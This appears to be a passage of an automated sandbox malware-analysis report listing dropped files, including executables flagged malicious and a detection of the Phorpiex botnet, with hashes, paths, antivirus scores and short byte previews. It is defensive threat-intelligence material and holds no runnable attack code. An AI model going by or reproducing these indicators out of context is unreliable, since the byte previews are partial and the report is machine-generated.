                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                            Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):110600
                                                                                                                                                                                            Entropy (8bit):7.998486619051527
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                                                            MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                                                            SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                                                            SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                                                            SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O
                                                                                                                                                                                            Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                            Entropy (8bit):5.134070469138298
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
                                                                                                                                                                                            MD5:96509AB828867D81C1693B614B22F41D
                                                                                                                                                                                            SHA1:C5F82005DBDA43CEDD86708CC5FC3635A781A67E
                                                                                                                                                                                            SHA-256:A9DE2927B0EC45CF900508FEC18531C04EE9FA8A5DFE2FC82C67D9458CF4B744
                                                                                                                                                                                            SHA-512:FF603117A06DA8FB2386C1D2049A5896774E41F34D05951ECD4E7B5FC9DA51A373E3FCF61AF3577FF78490CF898471CE8E71EAE848A12812FE98CD7E76E1A9CA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....k..".../.......&.w.,...&.b.....Rich/...................PE..L...'V.f..................................... ....@..........................`.......e....@.................................<$.......@.......................P......................................x#..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1091722296.exe
                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5827584
                                                                                                                                                                                            Entropy (8bit):7.718261688436852
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                            MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                            SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                            SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                            SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                            Entropy (8bit):5.259790062623363
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:0iBbxFJyyHpXQE+FJx34ymFpQ9999999999999999999999999999999999999KI:XxF0yHR+Foy
                                                                                                                                                                                            MD5:5A0D146F7A911E98DA8CC3C6DE8ACABF
                                                                                                                                                                                            SHA1:4EC56B14A08C897A5E9E85F5545B6C976A0BE3C1
                                                                                                                                                                                            SHA-256:BF61E77B7C49CE3346A28D8BC084C210618EA6EC5F3CFA9AE8F4AA4D64E145F1
                                                                                                                                                                                            SHA-512:6D1526A5F467535D51B7F9B3A7AF2D54512526E2523E3048082277B83B6E1A1F0D7E3C617405898F240AE84A16163BC47886D8541A016B31C51DFADF9DA713E1
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,CE.B.E.B.E.B.b.9.M.B.L...F.B.E.C.u.B.L...D.B.L...P.B.L...F.B.L...D.B.RichE.B.................PE..L......g.....................&......_........ ....@..........................p............@.................................<#..x....P.......................`..`...................................p"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...4....0......................@....rsrc........P......................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8704
                                                                                                                                                                                            Entropy (8bit):5.0125514402992275
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
                                                                                                                                                                                            MD5:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                                                            SHA1:416FC65D538D3622F5CA71C667A11DF88A927C31
                                                                                                                                                                                            SHA-256:5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
                                                                                                                                                                                            SHA-512:BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(....*....4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&..*..........66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....
                                                                                                                                                                                            Process:C:\Users\user\Desktop\Us051y7j25.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                            Entropy (8bit):6.394560338648692
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                                                            MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                            SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                                                            SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                                                            SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\21324.scr, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):15872
                                                                                                                                                                                            Entropy (8bit):5.151089744220859
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:M2moXxWtTFRyGMdMdMdMdMdMdMdMdMP/F2:MJoi6g
                                                                                                                                                                                            MD5:0C37EE292FEC32DBA0420E6C94224E28
                                                                                                                                                                                            SHA1:012CBDDDADDAB319A4B3AE2968B42950E929C46B
                                                                                                                                                                                            SHA-256:981D724FEEBC36777E99513DC061D1F009E589F965C920797285C46D863060D1
                                                                                                                                                                                            SHA-512:2B60B571C55D0441BA0CFC695F9DB5CD12660EBEC7EFFC7E893C3B7A1C6CB6149DF487C31B8D748697E260CBC4AF29331592B705EA9638F64A711C7A6164628B
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..WQ..WQ..WQ..p...]Q..^)S.TQ..WQ..jQ..^)U.UQ..^)C.BQ..^)D.TQ..^)Q.VQ..RichWQ..........................PE..L......f..................................... ....@..........................p......xn....@..................................&..x....P.......................`..x....................................&..@............ ...............................text...d........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........P.......6..............@..@.reloc.. ....`.......:..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):110600
                                                                                                                                                                                            Entropy (8bit):7.998486619051527
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                                                            MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                                                            SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                                                            SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                                                            SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
